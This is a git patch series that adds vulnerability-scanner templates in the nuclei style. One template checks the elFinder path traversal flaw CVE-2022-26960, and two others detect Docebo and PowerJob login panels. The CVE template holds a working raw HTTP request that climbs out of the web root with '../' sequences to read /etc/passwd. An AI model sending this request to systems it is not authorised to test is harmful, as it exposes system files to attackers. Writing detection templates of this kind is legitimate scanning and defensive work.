From ec5b5300251aa3828520e12626fd609af77403ee Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 30 Jun 2022 19:18:26 -0400 Subject: [PATCH 01/10] Create CVE-2022-0543 --- cves/2022/CVE-2022-0543 | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2022/CVE-2022-0543 diff --git a/cves/2022/CVE-2022-0543 b/cves/2022/CVE-2022-0543 new file mode 100644 index 0000000000..c259789775 --- /dev/null +++ b/cves/2022/CVE-2022-0543 @@ -0,0 +1,25 @@ +id: CVE-2022-0543 + +info: + name: elFinder - Path Traversal + author: PIKPIKCU + severity: critical + description: | + Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + reference: + - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 + tags: cve,cve2022,lfi,elfinder + +requests: + - raw: + - | + GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" From 789f6596456dccc59a2555b770e3651c54ec6e58 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 30 Jun 2022 19:19:18 -0400 Subject: [PATCH 02/10] Update CVE-2022-0543 --- cves/2022/CVE-2022-0543 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-0543 b/cves/2022/CVE-2022-0543 index c259789775..015a33cf3d 100644 --- a/cves/2022/CVE-2022-0543 +++ b/cves/2022/CVE-2022-0543 @@ -2,7 +2,7 @@ id: CVE-2022-0543 info: name: elFinder - Path Traversal - author: PIKPIKCU + author: pikpikcu severity: critical description: | Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. From 732217c33ab59c3fc3e2c9cbb4a67be7f4abf502 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 30 Jun 2022 19:29:04 -0400 Subject: [PATCH 03/10] Create docebo-detect.yaml --- technologies/docebo-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/docebo-detect.yaml diff --git a/technologies/docebo-detect.yaml b/technologies/docebo-detect.yaml new file mode 100644 index 0000000000..95ff301e51 --- /dev/null +++ b/technologies/docebo-detect.yaml @@ -0,0 +1,25 @@ +id: docebo-detect + +info: + name: Docebo Detect + author: pikpikcu + severity: info + metadata: + fofa-query: title="Docebo E-learning" + tags: tech,docebo + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Docebo E-learning" + + - type: status + status: + - 200 From 6735f99a543652f086c1b4b10e9c47439d8d3f22 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 30 Jun 2022 19:29:52 -0400 Subject: [PATCH 04/10] Delete CVE-2022-0543 --- cves/2022/CVE-2022-0543 | 25 ------------------------- 1 file changed, 25 deletions(-) delete mode 100644 cves/2022/CVE-2022-0543 diff --git a/cves/2022/CVE-2022-0543 b/cves/2022/CVE-2022-0543 deleted file mode 100644 index 015a33cf3d..0000000000 --- a/cves/2022/CVE-2022-0543 +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2022-0543 - -info: - name: elFinder - Path Traversal - author: pikpikcu - severity: critical - description: | - Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. - reference: - - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 - tags: cve,cve2022,lfi,elfinder - -requests: - - raw: - - | - GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" From 53a775abd2c0a58d9185c5d9818e0988f634a119 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 30 Jun 2022 19:31:46 -0400 Subject: [PATCH 05/10] Create CVE-2022-26960.yaml --- cves/2022/CVE-2022-26960.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2022/CVE-2022-26960.yaml diff --git a/cves/2022/CVE-2022-26960.yaml b/cves/2022/CVE-2022-26960.yaml new file mode 100644 index 0000000000..d524eab2d5 --- /dev/null +++ b/cves/2022/CVE-2022-26960.yaml @@ -0,0 +1,25 @@ +id: CVE-2022-26960 + +info: + name: elFinder - Path Traversal + author: pikpikcu + severity: critical + description: | + Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + reference: + - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 + tags: cve,cve2022,lfi,elfinder + +requests: + - raw: + - | + GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" From f7153e19af2afa6b7c82ce13677702087571821a Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 30 Jun 2022 19:51:40 -0400 Subject: [PATCH 06/10] Create powerjob-detect.yaml --- technologies/powerjob-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/powerjob-detect.yaml diff --git a/technologies/powerjob-detect.yaml b/technologies/powerjob-detect.yaml new file mode 100644 index 0000000000..fae537f6af --- /dev/null +++ b/technologies/powerjob-detect.yaml @@ -0,0 +1,25 @@ +id: powerjob-detect + +info: + name: PowerJob Detect + author: pikpikcu + severity: info + metadata: + fofa-query: title="PowerJob" + tags: tech,powerjob + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "PowerJob" + + - type: status + status: + - 200 From 8848779eae68c2e3af7671533c7a75109a855e70 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Jul 2022 17:21:12 +0530 Subject: [PATCH 07/10] Update and rename technologies/docebo-detect.yaml to exposed-panels/docebo-elearning-panel.yaml --- .../docebo-elearning-panel.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename technologies/docebo-detect.yaml => exposed-panels/docebo-elearning-panel.yaml (72%) diff --git a/technologies/docebo-detect.yaml b/exposed-panels/docebo-elearning-panel.yaml similarity index 72% rename from technologies/docebo-detect.yaml rename to exposed-panels/docebo-elearning-panel.yaml index 95ff301e51..1144fc5667 100644 --- a/technologies/docebo-detect.yaml +++ b/exposed-panels/docebo-elearning-panel.yaml @@ -1,12 +1,12 @@ -id: docebo-detect +id: docebo-elearning-panel info: - name: Docebo Detect + name: Docebo E-learning Login Panel author: pikpikcu severity: info metadata: fofa-query: title="Docebo E-learning" - tags: tech,docebo + tags: panel,docebo requests: - method: GET @@ -18,7 +18,7 @@ requests: - type: word part: body words: - - "Docebo E-learning" + - "Docebo E-learning" - type: status status: From 8a40ab6de85eba6c78bfde7a1c6ea0fbad7e205d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Jul 2022 17:25:24 +0530 Subject: [PATCH 08/10] Update and rename technologies/powerjob-detect.yaml to exposed-panels/powerjob-panel.yaml --- .../powerjob-panel.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename technologies/powerjob-detect.yaml => exposed-panels/powerjob-panel.yaml (78%) diff --git a/technologies/powerjob-detect.yaml b/exposed-panels/powerjob-panel.yaml similarity index 78% rename from technologies/powerjob-detect.yaml rename to exposed-panels/powerjob-panel.yaml index fae537f6af..2cfd129e20 100644 --- a/technologies/powerjob-detect.yaml +++ b/exposed-panels/powerjob-panel.yaml @@ -1,12 +1,13 @@ -id: powerjob-detect +id: powerjob-panel info: - name: PowerJob Detect + name: PowerJob Login Panel author: pikpikcu severity: info metadata: + verified: true fofa-query: title="PowerJob" - tags: tech,powerjob + tags: panel,powerjob requests: - method: GET From d239dee390ad79b22bd681931c3cbf4d9fe2f9be Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Jul 2022 17:25:32 +0530 Subject: [PATCH 09/10] Update docebo-elearning-panel.yaml --- exposed-panels/docebo-elearning-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/docebo-elearning-panel.yaml b/exposed-panels/docebo-elearning-panel.yaml index 1144fc5667..1e0c7a6814 100644 --- a/exposed-panels/docebo-elearning-panel.yaml +++ b/exposed-panels/docebo-elearning-panel.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: info metadata: + verified: true fofa-query: title="Docebo E-learning" tags: panel,docebo From 01e8acba05822a1dd74ffe6438d9f4af5eed27fd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Jul 2022 18:02:11 +0530 Subject: [PATCH 10/10] Update CVE-2022-26960.yaml --- cves/2022/CVE-2022-26960.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-26960.yaml b/cves/2022/CVE-2022-26960.yaml index d524eab2d5..6093524c0e 100644 --- a/cves/2022/CVE-2022-26960.yaml +++ b/cves/2022/CVE-2022-26960.yaml @@ -3,18 +3,20 @@ id: CVE-2022-26960 info: name: elFinder - Path Traversal author: pikpikcu - severity: critical + severity: high description: | Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. reference: - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 + metadata: + verified: true tags: cve,cve2022,lfi,elfinder requests: - raw: - | - GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1 + GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded @@ -23,3 +25,7 @@ requests: - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200